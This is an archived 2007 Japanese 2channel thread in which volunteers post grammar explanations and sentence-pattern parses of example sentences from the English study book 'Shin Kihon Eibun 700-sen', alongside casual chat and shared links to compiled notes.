M2((When s v x)), / I / wish / <s v x>. (文型:S V O)
あるいは、気持ちとしては、
M2((When s v x)), // (I wish) // S / could speak / M2((...well...)). (文型:S V)

when節内は、S / hear / O / 原形不定詞 (文型:S V O C)
O C の部分(ネクサス)を、独立した文に変形すると、He / speaks / English. (文型:S V O)
(例文100、例文305参照)

「I wish/wished <仮定法>」で「たとえ話」としての願望を表します。
as if / as though と同様、主文と同じ時のたとえ話であれば仮定法過去を、
主文より前の時のたとえ話であれば仮定法過去完了を使います。
この形では、通常 that は省略されます。
該当箇所:
「§268 願望を表す構文」

M2((...well...)) のところは、副詞要素の入れ子構造なんで表記が難しいところですが、
((even)) / ((half)) ((as)) well ((as he does))
ということで、あとは下記を参照してください。
参考:
「§151 倍数表現、[1] 〈as 〜 as …〉を用いた倍数表現、(1) 「AはBの〜倍の…である」の表し方」
「§131 倍数詞」

554 :勝手口 ◆KatteG.R4k :2007/01/05(金) 22:37:01
遅くなりましたが、あけましておめでとうございます。
本年もよろしくです。


312.(仮定法:wish 仮定法過去)
M2((When s v x)), / I / wish / <s v x>. (文型:S V O)
あるいは、気持ちとしては、
M2((When s v x)), // (I wish) // S / could speak / M2((...well...)). (文型:S V)

when節内は、S / hear / O / 原形不定詞 (文型:S V O C)
O C の部分(ネクサス)を、独立した文に変形すると、He / speaks / English. (文型:S V O)
(例文100、例文305参照)

「I wish/wished <仮定法>」で「たとえ話」としての願望を表します。
as if / as though と同様、主文と同じ時のたとえ話であれば仮定法過去を、
主文より前の時のたとえ話であれば仮定法過去完了を使います。
この形では、通常 that は省略されます。
該当箇所:
「§268 願望を表す構文」

M2((...well...)) のところは、副詞要素の入れ子構造なんで表記が難しいところですが、
((even)) / ((half)) ((as)) well ((as he does))
ということで、あとは下記を参照してください。
参考:
「§151 倍数表現、[1] 〈as 〜 as …〉を用いた倍数表現、(1) 「AはBの〜倍の…である」の表し方」
「§131 倍数詞」

555 :勝手口 ◆KatteG.R4k :2007/01/06(土) 01:03:08
連投すみません...
以後、気をつけます。

556 :名無しさん@英語勉強中:2007/01/06(土) 01:50:15
ワロタw

まー鯖調子悪いからねぇ

557 :名無しさん@英語勉強中:2007/01/06(土) 18:22:33


558 :名無しさん@英語勉強中:2007/01/06(土) 19:30:03
べっくりした。どっかの馬鹿が勝手口氏のトリが抜いて連投したのかとおもた

559 :名無しさん@英語勉強中:2007/01/06(土) 20:32:02
ちょwww 700選をひたすら品詞分解している者だが
前から品詞分解のは知ってて使ってたんだが700選の文法解説とか
作ってたとは・・・・ あんたら神か・・ まじ感謝するわ。
あと英文法大全ってサイトもまじ使えるわ

560 :名無しさん@英語勉強中:2007/01/06(土) 21:51:37
>>559
照れる

561 :勝手口 ◆KatteG.R4k :2007/01/06(土) 22:28:27
昨日は失礼しました。


313.(仮定法:wish 仮定法過去完了)
I / wish / <s v x>. (文型:S V O)
あるいは、気持ちとしては、
(I wish) // S / had told / O / A((about O)) / M2((beforehand)). (文型:S V O A)
S / couldn't do / so / M2((because of O)). (文型:S V O [S V A])

「I wish <仮定法過去完了>」については、例文312を参照。

「do so」の文型って微妙ですね。
参考:
「§96 so の用法、[1] 代名詞的な so の用法、(2) do の目的語になって,do so の形で代動詞的に用いる」

「his sudden departure」を文にするとこんな感じ。
cf. He / ((suddenly)) departed. (文型:S V)
文→名詞句のポイント:主語→所有格、動詞→名詞、副詞要素→形容詞要素

562 :!omikuji ◆IuJiIQCtrs :2007/01/07(日) 00:15:59
5連投かよ
勝手口まで荒らしになったのかと思った

563 :名無しさん@英語勉強中:2007/01/07(日) 07:48:13
そういえば年末年始の鯖が重い中でイタイ連投してたやつがいたっけな

564 :名無しさん@英語勉強中:2007/01/07(日) 13:54:27
西川口氏が129まで解説したら、いいものをうpしてやろう。

565 :名無しさん@英語勉強中:2007/01/07(日) 13:56:58
いいものとは「俺の出口」だ。
欲しければはやく129まで解説しろ

566 :名無しさん@英語勉強中:2007/01/07(日) 17:00:21
ちょ、>>565
ちがうって、ワードで作った西川口氏+勝手口氏の解説。
文字サイズは8(最小)だから安心しる。
そのままプリントすると、解説が切れずに結構見やすい仕様になってる。
まとめに載ってる解説じゃなくて、スレで書き込まれた解説をあつめたやつ。



567 :名無しさん@英語勉強中:2007/01/07(日) 18:18:13
>>566


多重人格自演荒らしの反応速度には脱帽だなw

568 :勝手口 ◆KatteG.R4k :2007/01/08(月) 22:15:04
314.(仮定法:wish 仮定法過去)
I / wish / <s v x>. (文型:S V O)
あるいは、気持ちとしては、
(I wish) // S / would turn ((off)) / O. (文型:S V O)
S / is getting / A((on my nerves)). (文型:S V A)

「I wish」や「If only」の後は、would や might など法助動詞過去形を使った仮定法がくることがあります。
条件節で助動詞過去形を使うケースに準じるものと考えられます。例文300参照。
(江川 p.256)


315.(仮定法:It is time 仮定法過去)
It / is / time <=(that) s v x>. (文型:S V C)
あるいは、気持ちとしては、
(It is time) // S / started / earning O. (文型:S V O)

受験英語ではおなじみですね。
仮定法過去だけでなく、「仮定法現在(米)か、should をつける(英)」パターンも使われます。
また、1人称単数/3人称単数では、was を使う方が普通です。
該当箇所:
「§269 It is time 〜 の構文」

569 :名無しさん@英語勉強中:2007/01/10(水) 21:34:54

新スレ

新・基本英文700選を解説するスレ
http://academy5.2ch.net/test/read.cgi/english/1168425712/



570 :名無しさん@英語勉強中:2007/01/10(水) 21:46:18


571 :勝手口 ◆KatteG.R4k :2007/01/10(水) 22:38:11
316.(命令法:否定の命令文)
Don't be / C / M2((on...occasion)). (文型:(S) V C)(命令文)

該当箇所:
「§253 命令法 (Imperative Mood)」

否定の命令文は、be動詞でも一般動詞でも don't を頭につけます
成句的表現や「どんなときでも〜するな」を表すときは neverをつけます(江川 p.454 参照)。
該当箇所:
「§253 命令法、[1] 2人称に対する命令、(2) 否定の命令」

「such a/an 単数名詞」の語順については、以下を復習(例文157参照)。
該当箇所:
「§79 冠詞の位置、[2] ふつうの語順をとらない場合、(1) 〈such+a [an]+名詞〉など」

572 :勝手口 ◆KatteG.R4k :2007/01/10(水) 22:39:09
317.(命令法:命令文+AND)
Listen M2 / A((to <what s v>)), // (文型:(S) V A)(命令文)
and // S / cannot fail / to v x. (文型:S V to do)

「命令文+and (助動詞)」の形です。
あまり言われませんが、後半の文に will などの法助動詞がつくと意識しておいた方が良いと思います。
and は、両方が同時に成立することを表します。
このパターンは「andやorで並列構造にならないもの」としてしっかり憶えておく必要があります。
該当箇所:
「§289 等位接続詞、[1] 連結を示す等位接続詞、(1) and、【3】〈命令文+and〉」
「§36 重文、(3)-[注]〈命令文+and [or] 〜〉」

to不定詞のところは、understand / <what s v> (文型:(S) V O)

fail to do は、be to do や come to do などと同様、助動詞的に考えた方がわかりやすいかもしれません。
該当箇所:
「§377 否定を表す慣用表現、[1] 否定語句を用いない否定表現、(2)-【3】〈fail to 〜〉」
(「never fail to do」の使い方に注意しましょう)


318.(命令法:命令文+OR)
Be / C / A((of...language)) / M2((in...others)), // (文型:(S) V C A)(命令文)
or // S / will be / C / A((for O)). (文型:S V C A)

「命令文+or (助動詞)」の形です。
or は、どちらか一方しか成立しないことを表します。
該当箇所:
「§289 等位接続詞、[2] 選択を示す等位接続詞、(1) or、【4】〈命令文+or〉」
「§36 重文、(3) or」

573 :西川口 ◆Im4lkGa4xk :2007/01/11(木) 00:56:13
なぜ書き込めないんだろ?

574 :西川口 ◆Im4lkGa4xk :2007/01/11(木) 01:10:40
亀ですが、あけましておめでとうございます。

>>496
レス乙です。
ここは素直に解釈1を正とした方がよさそうですね。

>>497
>それに対し下の二つは違いますね。普通の"out of"に慣れていると気持ち悪いです。
>They cheated him out of his money.
>He robbed me out of my purse.

この場合の out は、強意なんでしょうね。「身ぐるみ剥いだ」みたいなニュアンスでしょうか。

>>505
いつも乙です。

575 :西川口 ◆Im4lkGa4xk :2007/01/11(木) 01:14:28
127の文
次の文と構造が同じ。
When it rains, it pours. (降れば土砂降り)
*when で始まる従属節が主節に先行しているので、anything の後にカンマが必要。
(余談ですが、カンマの重要性をねちねち書いてる本が意外と売れてるみたいです。
"Eats, shoots and leaves" これの絵本版も出ていて、結構笑えます。)

anything は、「どんなことも」。
ちなみに本文のanythingをsomething に変えると、
(彼は「あること」を始めると、それに没頭してしまいます。)
なんだかクイズの問題みたいになってしまいます。

devote はgive 系で、S+V+O+to+名詞の構造。(例文90参照)
he devotes himself to it.(彼自身をそれに捧げる→それに没頭する)
ほぼ同じ意味の単語、dedicate もよく見かけます。dedicate oneself to ... と用法も同じ。

576 :西川口 ◆Im4lkGa4xk :2007/01/11(木) 23:25:32
128の文
help oneself は、「自分自身を助ける」→「自分でなんとかする」

S+V+O+to+名詞の構造なので、そこはかとなくgive 感も漂います。
(何でも好きな物にあなた自身を与えてください。)「てにをは」が微妙ですが、
これにhelp yourself が加味されて、
→(何でも好きな物に向かって、自分でなんとかしてください。)

anything は「どんなものでも」
something に変えると、(あなたの好きな「あるもの」を召し上がって下さい)
あなたの好きな物を特別に用意してくれてるような感じになります。(例文127参照)

577 :西川口 ◆Im4lkGa4xk :2007/01/11(木) 23:29:35
例文127と128でanything が出てきたので、補足の意味で。

anything と something の違い
anything は、「なんでも」「いかなるもの」「どんなことも」等と訳されるように、対象は全く
特定されていません。つまり、頭の中には特定のイメ―ジはありません。なんでもいいという場合です。
something の場合は、話し手の頭の中に、漠然としてはいるものの、それなりに特定されたイメ―ジがあります。

飲み物を勧める場合で、「お茶でも勧めた方がいいかな。たしか、冷蔵庫にビ―ルとオレンジジュ―スもあったし...」
Do you like something to drink? (なにか飲みますか?)
*頭の中には、自分の用意できる飲み物像が漠然とあります。

Do you like anything to drink? (なんか飲みたいものがあるの?)
*頭の中には、具体的な飲み物像はありません。単に飲みたいものがあるかどうかを聞いているだけ。
さらに言うと、全然勧めてる感じもしません。

Do you need some help? (何か手伝いましょうか?)
*頭の中には、何らかの助ける手だてをイメ―ジしています。
Do you need any help? (何か手伝ってほしいことがあるの?)
*単に助けが必要かどうかを聞いてるだけ。むしろ逆に、「助けはいらんだろ?」と言ってる感じもします。

I'll do something. (私は何かをやりますよ)*頭の中にできることのイメ―ジがあります。自信満々。
I'll do anything. (何でもやります)*単に決意を表してる感じ。

578 :勝手口 ◆KatteG.R4k :2007/01/11(木) 23:43:14
>>574
お、復活ですね。今年もよろしくです。


319.(命令法:suppose)
M2((Suppose (that) s v x)), / O<what> / would / S / do / A((with O))? (文型:S V O A)(疑問文)

[条件節=仮定法過去]+[帰結節=仮定法過去]の仮定法です。

suppose (that) は、「考えてごらん」という命令法ですが(Imagine...も同じですね)、
if節と同様の条件節と考えた方がわかりやすいでしょう(例文317/318も if で書き換え可能です)。
この suppose は、if と同様、直説法でも仮定法でも使えます。
なお、suppose を条件節として使うのは、通常、帰結節が疑問文の場合です(江川 p.399)。
(分詞構文に由来する supposing (that) も同様の使い方をします)
該当箇所:
「§257 条件文の形、[2] if に代わる語句」
「§295 条件・譲歩の副詞節を導く接続詞、[1] 条件の副詞節を導く接続詞、(3) suppose...」

suppose節内は、S / had / O (文型:S V O)

「do <what> with ○○」で「○○をどのように扱うか?」という意味になります。
この形は、目的語に what しかこないので、必ず疑問文で使われます(『G3』do の項、参照)。
「do with O」とは異なりますので注意しましょう。

579 :勝手口 ◆KatteG.R4k :2007/01/11(木) 23:44:13
320.(命令法:say)
M2((To v x)), / let's look / A((at O)), / (say, O'). (文型:(S) V A)(命令文)

to不定詞のところは、see / O / M2((more clearly)) (文型:(S) V O)

say も、命令法から派生した使い方があり、この例文では「たとえば」という同格を意味しています。
『G3』だと「他動詞5」あたりに命令法に由来する使い方がまとめてあるので、一度読んでおきましょう。
該当箇所:
「付録1 類例リスト、10. 《同格語句を導く語句》」

580 :名無しさん@英語勉強中:2007/01/12(金) 00:31:35
すみません

456番(天気予報が外れたってやつ)、
…, which was quite contrary …


音声では
…, which is quite contrary …
と聞こえるんだがどう思いますか?

581 :名無しさん@英語勉強中:2007/01/12(金) 00:37:56
>>580
wasとしっかり言ってますね。
もしisなら、”ウィッチーズ”みたいな感じになります。

582 :名無しさん@英語勉強中:2007/01/12(金) 01:27:17
>>581
”ウィッチーズ”とは聞こえないです。
しかし"was"とも聞こえないんです。

弱い発音のところは聞き取りにくい。


・・・と、ここで思ったんですが
英語力がある人なら、ここが聞き取れなくても文意から"was"と推定できるのだろうか。

583 :名無しさん@英語勉強中:2007/01/12(金) 01:51:23
whi(ch_w)as

584 :名無しさん@英語勉強中:2007/01/12(金) 21:21:17
発音がひどいのは
She is always finding faults 〜,is she faultless herself?

She                〜, yourself?
って聞こえる、てか言ってる

585 :名無しさん@英語勉強中:2007/01/12(金) 22:11:35
2ちゃん閉鎖か・・・
いままでありがとう解説者

586 :名無しさん@英語勉強中:2007/01/12(金) 22:25:57
700選文法解説の方でS+be+p.p.+Verbal,etc と S+V+Adjective+Verbal,etc.が
無いのが不安

587 :名無しさん@英語勉強中:2007/01/12(金) 23:42:06
まあ、たぶん閉鎖しないとは思うけど、もし一時的でも閉鎖したらどこで解説するの?

588 :西川口 ◆Im4lkGa4xk :2007/01/13(土) 10:10:00
129の文
look は、脚注にもあるように「視線を向ける」がもともとの意味。
LOOK! と叫ばれたら、(視線を向けろ!)→(危ない!)です。
叫んでいる人を見ていてはいけません。視線を変えて、どんな危険が迫っているか確認した方がいいでしょう。

look to 〜 (〜の方を見る)→(〜を頼る)
上司のJackと客先に打ち合わせに行きました。お客さんから、「こないだの100万円の見積ですが、
なんとか80万円にしていただけませんか?」と言われ、答えに困って上司の方を見る感覚。
I looked to Jack for an answer.
同じ「頼る」でも、depend on のような、べったり依存する頼り方とは違います。

direction は「方向」。冠詞の a や、複数形の 〜s が付いていないので、抽象的な「方向」
右とか左、北とか南のような具体的な方向ではなく、「指導」「指示」といった意味になります。
the をつけると、「一回こっきりの指示」になるので、意味があわなくなります。

589 :名無しさん@英語勉強中:2007/01/13(土) 12:14:02
ネタで終わるだろうがこのスレ無くなるとやる気が続きそうにない・・・

590 :勝手口 ◆KatteG.R4k :2007/01/13(土) 23:04:00
>>580
こういうの難しいですよね。
文意ももちろん助けになりますけど、例文437なんかと比べると、やっぱ違うかな。
>>584
his や her の「h」って実際聞こえないですよね(発音されない?)。
んで、リエゾン(アンシェヌマン?)になるんで、一層やっかいです。


321.(命令法:Suffice it to say that...)
M2, / suffice / it / ((to say)) / <that s v x>. (文型:(S) V O)(形式目的語のit:真主語がthat節)
あるいは、気持ちとしては、
M2, / (suffice it to say that) / S / misunderstands M2 / <what s v>. (文型:S V O)

「Suffice it to say that...」は、命令法もしくは命令の仮定法現在とされますが、
あまりごちゃごちゃ言わずに、そのまま憶えた方が良いでしょうね。
「Suffice to say, ...」という形でも使われます。
該当箇所:
「§270 仮定法を含む慣用表現、[4]-(2)-[参考]仮定法現在の用法、(1) 独立した節で」

なお、Jeffery は、カタカナ表記するなら「ジェフリー」の方が一般的だと思います。

591 :勝手口 ◆KatteG.R4k :2007/01/13(土) 23:04:59
322.(命令法:[命令法+関係詞]による譲歩)
M2((Come what may)), ((come what may)), / S / will love / O, / M2((until O)). (文型:S V O)

「命令法+α, 通常の文」で、命令法の部分が譲歩を表すことがあります(『英文法詳解』pp.293-295)。
パターンとしては、(1)命令法+関係詞、(2)命令法+as、(3)命令法+ever so、があり、
それぞれに「Let 目的語」が頭につくこともあります。
該当箇所:
「§378 文法上の慣習的倒置、[2] 条件節・譲歩節の中の倒置、(2) 譲歩節の中の倒置」

「come what may」は定型表現として今でもよく使われているようですが、
一般的に、この形は文語表現なので、読めればそれで十分でしょう
(これも、命令の仮定法現在の名残だそうです。江川 p.395、安藤 p.367)。
書くときには、複合関係詞の譲歩表現を使うと良いと思います(例文507-515あたりを参照)。
cf. Whatever may come, ...

592 :名無しさん@英語勉強中:2007/01/13(土) 23:15:36
..∩_∩∩___∩      ヽ /´∀`;:::\∵∴ ∧ ∧ __   ハ_ハ┗(^o^ )┓ ∧ ∧
(´ー`)       ヽ____|__||_| )∧_∧/::::::::::| ∴∵‘ω‘ *) ・∀・|ノ('(゚∀゚∩┏┗,,,,_ヽ(・∀ ・)ノ
(   ) ●   ● |□━□ (´∀` )::::|::::::|(・)∴∵∴ )   /⌒ヽヽ  〈./ ,' 3  `ヽーっ )ヽ ))
 ̄ ̄ ̄\ ( _●_)  ミ J  (    ∧∧::::| ,○、:(・)∵二二( ^ω^)二⊃l   ⊃ ⌒_./ ̄\
  ●  ●、 ∪|  ̄\―..〜′ ̄ ̄(,,゚Д゚)│ミ / ∴∵∴∵|    /__|_`'ー---‐''''' |  ^o^ |
        \∧ ∧/ ̄ ̄ ̄ ̄\U U/ ̄\ ./\___/ヽヽノ _     _   |三 \_/
/■\   ▼ | ・ ・ .|  ()  ()   |─( ゚ ∀ ゚/''''''   '''''':::::::\  三シ   ヾ三  |三 , -=ミ
´∀`∩)──- 、)●(|    ∀ ∧_∧ /⌒ヽ.(●),   、(●)、.:|   .._     _,,..  i /:::::::::::: 
つ/. : : : : : : : : : \ ∧_∧  (´<_`  ) ´_ゝ`)  .,,ノ(、_, )ヽ、,, .::::|<でiンヽ  ;'i"ィでiン /::::::::::::::::::::
..,!::: : : :,-…-…-ミ: : :( ´_ゝ`) /   ⌒i.   /   `-=ニ=- ' .:::::::|、 ‐' /  !、 ーシ l::::::rィノツノt
{:: : : : :i '⌒'  '⌒' i: : /   \     | | /| | \  `ニ∧_∧/  /⌒  ̄ ⌒\ !:::::: '"^'"`
{:: : : : | ェェ  ェェ |: :/    / ̄ ̄ ̄ ̄/ |  | | ( `Д)( ´∀` )◯ /( ●)  (●) ',::::j ==ュ 
_('A`)_(-_-)__(__ニつ/ ∧_∧ / .| .|─□( ヽ┐U     //::::::⌒(__人__)⌒fヾ}, ィ赱、 i
 ノ( ヘヘ  (∩∩)    \/ (  ^^ )/ (u ⊃ ◎−>┘◎ _ \|     |r┬-|   lと',  `"" ,l

                   GOOD-BYE 2ch WORLD !
                       1999 - 2007


593 :名無しさん@英語勉強中:2007/01/14(日) 00:01:09
西川口氏が129まで解説し終わったので、解説集Upする。
ttp://www.uploda.org/uporg652986.zip.html


個人的なお願いだが、西川口氏には解説を続けてほしい。
さらに個人的なお願いだが、解説の最初に勝手口氏のように

M2((Come what may)), ((come what may)), / S / will love / O, / M2((until O)). (文型:S V O)

とかをつけてほしい。初心者の俺にはすごい役立つ。


この発言が元で荒れませんように

594 :名無しさん@英語勉強中:2007/01/14(日) 00:02:02
パス忘れてました。
メール欄に入れるのが筋だが、sageなのでここに書いとく
Pass : kaisetu

595 :名無しさん@英語勉強中:2007/01/14(日) 00:06:32
GJ

596 :勝手口 ◆KatteG.R4k :2007/01/14(日) 00:51:43
>>593
乙です。
こういうの見ると、「単に自分の好きでやってることが、人の役に立ってるのかも!」
と思えて嬉しいです。

構文解析については、要望があるようなら、
例文326の解説が終わった後、
例文1-129の構文解析を進めるというのでもかまいません(いずれはやろうと思ってましたし)。
完全に俺流なので、西川口さんや他の解説者の方にお願いするのは申し訳ないです。

597 :西川口 ◆Im4lkGa4xk :2007/01/14(日) 04:11:23
>>593
>>596
試しにやってみます。
表記は、勝手口さんにならって、

< >:名詞要素。{ }:形容詞要素。(( )):副詞要素。
S:主語。V:動詞。O:目的語。C:補語。

ただし、S,O,C をくくるときは、[ ]とします。
1〜5文型の動詞は、それぞれ、V1, V2, V3, V4, V5
受動態になった場合は、-V3, -V4 -V5 (薬袋風)

わかりにくいと思われたら、勝手口さんにバトンタッチします。

598 :西川口 ◆Im4lkGa4xk :2007/01/14(日) 04:12:48
90. SVとSVOO
S must V1 ((up)) ((with your new post)) ((for the present)).
S'll V4 O[you] O[a better place] ((one of these days)).

91. SVOO
S V4 O[him] O[more than three months].

92. SVO
S cannot V3 O[ to V5 O[you] C[idle] ].

93. SVOC
No S {in the neighborhood} V5 O[him] C[to V2 a genious] ((even))
((after S had V3 O[world wide fame] )).

94. SVOC
S V5 O[us] C[ to V3 O[global communication] ].

95. SVOCとSV
S could not V5 O[anybody] C[ to V1 ((with me)) ], and so S V1 ((by myself)).

599 :西川口 ◆Im4lkGa4xk :2007/01/14(日) 04:14:40
96. SVOC
((Every morning)) S V5 O[her mother] C[ to V3 <breakfast> ((in the kitchen)) ].

97. SVOC
S V5 O[you] C[ to V2 C[present] ((at the wedding ceremony)) ], for S V2 C[<an old friend>
{of the bridegroom's} ].

98. SVOO
((While S was V3ing O[for the rain to V1] )), S ((kindly)) V4 O[me] O[a ride].

99. SV
S can V1 ((on the timetable)) (( to V4 O[you] O[when S V1] )).

100. SVO
S V3 O[such a mild disposition] ((that S have never V5 O[him] C[ V1 ((in a loud voice)) ] ))

600 :西川口 ◆Im4lkGa4xk :2007/01/14(日) 04:16:37
101. SVOC
S V5 O[the old gentleman] C[V3 O[the street] ], and C[ V3 O[a store] {on the corner} ]

102. SVOC
S'll V5 O[you] C[ V3 O[the results of the examination] ] ((when S V2 available)).

103. SVOC
S V5 O[me] C[ V1 ((as interpreter)) ]

104. SVOC
S would V5 O[somebody] C[ V5 O[this room] C[clean] ]

105. SVOC
(( As S V3 O[the pub] )), S V5 O[many people] C[ V3ing O[a soccer game] ((on television)) ]

601 :西川口 ◆Im4lkGa4xk :2007/01/14(日) 04:18:35
106. SVOC
S'll V5 O[you <all>] C[ V3ing O[fluent English] ((within a year)) ]

107. SVC
S V2 C[sorry] (( to have V5 O[you] C[V1ing so long] )). S has V5 O[me] C[busy] ((till now)).

108. SVOC
S must V5 O[my work] C[done] ((by the day after tommorrow))

109. SVO
S V3 O[ to V5 O[this letter] C[ -V5 ((into English)) ] ]

110. SVOC
S V5 O[ my pruse and commutation ticket ] C[stolen] ((while S was V1ing in the train)).

602 :西川口 ◆Im4lkGa4xk :2007/01/14(日) 04:21:21
なんだか、荒らしてるみたいになってきたのでこのへんで寝ます。
こういう文型分けは、解釈の分かれる余地が多分にあるので、
あくまでも参考程度にしてください。

603 :名無しさん@英語勉強中:2007/01/14(日) 10:12:40
つーか、そんなことまでしちまったら出口がカワイソウなんだが

604 :名無しさん@英語勉強中:2007/01/14(日) 11:55:10
凄くありがたいです

605 :名無しさん@英語勉強中:2007/01/14(日) 12:09:19
いつも解説、参考にさせていただいてます。
解説集が既に流れてしまっているのですが、
再うpはお願いできませんでしょうか?
気が向いたらでよろしいので、お願いいたします。


606 :西川口 ◆Im4lkGa4xk :2007/01/14(日) 19:45:23
>>管理人さん
更新ありがとうございます。

>>603
出口氏のサイトは、参考にさせていただいてます。
俺とは解釈の違う点もあり、比較検討すると理解が深まると思います。
どちらが正しいかというよりも、品詞分解の限界を感じ取るのがいいと思います。
(むしろ出口氏の方が一般的な気もしますし。)

とりあえず、73-129までは、やり終わってます。そんなに労力は掛かってないので、
様子を見ながら、ぽつぽつ上げていきます。

607 :593:2007/01/14(日) 20:30:40
>>597>>601
西川口氏、最高っすよ。まさかやってくださるとは。

>>596
役に立ちまくりです。わかりやすい解説をいつもありがとうございます。

英語力無いので解説はできませんが、たまに解説集めて援護射撃します。
勝手口氏も西川口氏もスレの皆さんもこれからもよろしく。

>>605
西川口氏の構文解析と入口氏の解説も付けとく。
ちょっとまってて




608 :勝手口 ◆KatteG.R4k :2007/01/14(日) 22:06:42
>>603
出口さんがやめろと言えばやめますけど、
たぶん用途が違うと思うので、住み分けできるんじゃないかと思います。
文法解説サイトで入門(1週目)→出口さんサイトで確認(2週目)
→自力で分析しながら文法解説サイト/出口さんサイトを検証(3週目)→英語の海
ってなイメージはどうでしょう。
いずれにせよ、出口さんの偉業は色あせることはないと思います。

>>597
乙です。完全に杞憂でしたね。


323.(命令法:[命令法+関係詞]による譲歩)
M2, / S / will see / O. (文型:S V O)

[命令法+関係詞]の譲歩節は、
You / will go / A((somewhere)) ((in Holland)). (文型:S V A)
ってな形からの変形。
cf. Wherever you will go in Holland, ...

609 :勝手口 ◆KatteG.R4k :2007/01/14(日) 22:07:24
324.(命令法:[命令法+as]による譲歩)
M2, / S / will never be able to define / O. (文型:S V O)

[命令法+as]の譲歩節は、
They / may try / (to define O). (文型:S V to do)
ってな形からの変形。
cf. However hard they try, ...

なお、複合関係詞の譲歩節で may を使うのは文語的な表現だそうです(江川 p.394)。
参考:
「§315 複合関係代名詞、(1) whoever の用法、【2】 譲歩の副詞節を導く」

目的語のところは、the word = "happiness" の同格。

610 :名無しさん@英語勉強中:2007/01/14(日) 23:06:52
>>593
末永くお待ちしております。




611 :名無しさん@英語勉強中:2007/01/14(日) 23:13:56
>>608
700選終わったら即英語の海ですか。強烈ですねー^^

612 :勝手口 ◆KatteG.R4k :2007/01/14(日) 23:46:54
>>611
すまん。あんま考えずに伊藤英語っぽいオチをつけようとしただけです...

613 :名無しさん@英語勉強中:2007/01/14(日) 23:51:14
失礼な質問だが解説者達は当然700選完璧になるまでやったんだよな?

614 :!heisa:2007/01/15(月) 01:33:15


615 :勝手口 ◆KatteG.R4k :2007/01/15(月) 21:48:42
325.(命令法:[命令法+関係詞]による譲歩)
M2, / S / will not succeed / A((in O)), / M2. (文型:S V A)

例文322-324 のパターンと同様ですが、「Let 目的語」が頭につくものです。
該当箇所:
「§253 命令法、[2] 間接命令、(2) 3人称に対する命令、[注]let の種々の用法」

[命令法+関係詞]の譲歩節のところは、Let / O / 原形不定詞 (文型:(S) V O C)
原形不定詞のところは、be / <what s v> (文型:(S) V C)
cf. Whatever your occupation is, ...

unless節は、S / devote / O / A((to O)). (文型:S V O A)


326.(命令法:[命令法+ever so]による譲歩)
M2, / there / is / S {←like O}. (文型:There V S)(there構文)

[命令法+ever so]の譲歩節は、
It / is / ((so)) humble. (文型:S V C)
ってな形からの変形。
cf. However humble it is, ...
該当箇所:
「§378 文法上の慣習的倒置、[2]-(2) 譲歩節の中の倒置、[注]Be it ever so …」
「§270 仮定法を含む慣用表現、[4]-(2)-[参考]仮定法現在の用法、(2) 譲歩を表す従節で」

616 :593:2007/01/15(月) 22:02:27
>>610
待たせてすまんかった。

前のが結構適当だったので、いろいろと修正しときました。
勝手口氏+西川口氏ttp://www.uploda.org/uporg655342.doc.html
入口氏+工口氏ttp://www.uploda.org/uporg655344.doc.html
パスは前と同じくkaisetu

印刷する人は、西川口氏が111〜129まで構文解析してから、それを
追加して印刷したほうがいいと思うよ。

>>613勝手口氏は、解説するためにわざわざ700選を購入してくれたんだよー



617 :西川口 ◆Im4lkGa4xk :2007/01/15(月) 23:09:54
>>613
100個くらいで挫折した覚えがあります。
昔の仇討ちを今果たしてる感じですね。

>>616
乙です。
俺のしょぼい解説を、そんなに大事に扱ってくれるとは感激です。
もっとがんばらねば。
とりあえず、129までアップします。

618 :西川口 ◆Im4lkGa4xk :2007/01/15(月) 23:11:02
111. SVOC
S always V5 O[us] C[ -V3 ((of the events)) { V3ing O[place] ((all over the world)) } ].

112. SV and VO
S V1 ((to him)) ((in English)) and V3 O[ S could V5 O[myself] C[-V3] ].

113. SVO
S V3 O[a nice toy] ((for her child)).

114. SVC
S are -V5 C[to V5 O[the amount of money{S V3}] C[as a criterion of his ability] ].

115. SVOC
S V5 ((upon)) O[ any time {not -V3 in study} ] C[ as much lost time ].

619 :西川口 ◆Im4lkGa4xk :2007/01/15(月) 23:11:55
116. SVO
S V3 O[him] (( on his V3ing O[high school] )).

117. SVO
S has ((considerably)) V3 O[us] (( of our time {for V1ing} )).

118. SVO. SVO.
V3 O[me] (( for V1ing)). S V3 O[ something { to V4 O[you] } ].

119. SVO
S V3 O[a little statue] ((out)) ((of soft cray)).

120. SVO
(( On V3ing O[school] )), S V3 O[him] (( with a table clock {as a token of our thanks} )).

620 :西川口 ◆Im4lkGa4xk :2007/01/15(月) 23:12:53
121. SVO
S V3 O[ that S V3 O[me] (( from V3ing O[your kind invitation] )) ].

122. SVO
S V3 O[me] ((of the good old days)).

123. SVO. SVOC.
S V3 O[me] ((on the shoulder)) ((from behind)).
S V5 O[me] C[for some other person], S V2 C[sure].

124. SVC. SVO.
S V2 C[twins]. S can ((hardly)) V3 O[one] ((from the other)).

125. SVOC
S V5 O[water] C[into ice].

621 :西川口 ◆Im4lkGa4xk :2007/01/15(月) 23:13:37
126. SVO
S V3 O[to V5 O[him] C[out of the project], but ((in vain)).

127. SVO
((When S V3 O[ to V3 O[anything] ] )), S V3 O[himself] ((to it)).

128. VO
V3 O[yourself] ((to anything { S V3 } )).

129. SV
S V1 ((to him)) ((for direction)) ((in everything)).

622 :593:2007/01/15(月) 23:49:04
>>617>>621西川口氏ありがとうございます。
せっかくなのでさっきUpしたのを消して、それらも追加したのをUpしておきます。
これを印刷してにやにやしましょう。
ttp://www.uploda.org/uporg655539.doc.html
パスはkaisetu


623 :名無しさん@英語勉強中:2007/01/16(火) 09:59:00
>>622
乙。
次回も期待してます。

624 :勝手口 ◆KatteG.R4k :2007/01/16(火) 21:57:28
>>616
お、文法解説が始まったころからの住人なんですね。


327.(助動詞:丁寧な表現の would)
I / am / sorry / to v x, // (文型:S V C to do)
but // would / you / ((kindly)) take / O / A((to O))? (文型:S V O A)(疑問文)

to不定詞のところは、trouble / O / M2((so often)) (文型:(S) V O)

仮定法のところで出てきましたが、
法助動詞の過去形を使って、丁寧な表現を表すことができます(例文300などを参照)。

「Will you...?」で相手の意志を尋ねることができますが、命令や要求など、強い意味にとられることがあります。
で、過去形を使った「たとえ話」にすることで、丁寧な依頼になるわけです。
該当箇所:
「§205 would の用法、(3) 丁寧な表現」
参考:
「§204 will の用法、(3) 相手の意志」

625 :勝手口 ◆KatteG.R4k :2007/01/16(火) 21:58:19
328.(助動詞:勧誘の Won't you...?)
Won't / you / come / A((in)) // and // have / O? (文型:S V A and V O)(疑問文)

Won't you...? は、「〜しないの?」→「もちろん、〜するでしょ?」という感じで、
